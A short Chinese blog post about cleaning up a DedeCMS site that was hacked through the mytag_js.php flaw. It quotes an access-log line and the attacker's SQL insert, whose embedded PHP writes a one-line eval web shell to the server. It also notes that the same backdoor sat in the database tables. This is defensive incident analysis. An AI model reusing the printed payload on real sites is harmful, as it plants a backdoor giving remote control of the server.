话说我朋友的网站是dedecms的,上次遭到了mytag_js.php漏洞的入侵,之后我给他做了基本的安全设置(目录不可写,不可执行等)但他还是被黑了。
于是就翻日志,发现了这么一条:
xxx.xx.xx.xxx – – [26/Nov/2011:14:28:33 +0800] “POST /plus/mytag_js.php?id=8 HTTP/1.1″ 200 1141402
想,他请求这么多次?id=8干啥啊,结果想了想,既然漏洞利用条件是远程数据库并且在数据里插入了
insert into dede_mytag(aid,normbody) values(2,’{dede:php}$fp = @fopen(DEDEROOT.”safe121.com.php”, ”a”);@fwrite($fp, ”<?php eval($_POST["www.safe121.com"]) ?>”);echo “y”;@fclose($fp);{/dede:php}{/dede:php}’);
会不会他在本地数据库里也插入了这个呢,结果一看,还真是..
(此图已经经过处理)
然后又检查了myad_js表,均发现了这种后门,清理之,网站就没被入侵了。
标签分类: 数据库插马 DedeCMS入侵
孝敬父母、疼爱孩子、体贴爱人、善待朋友。
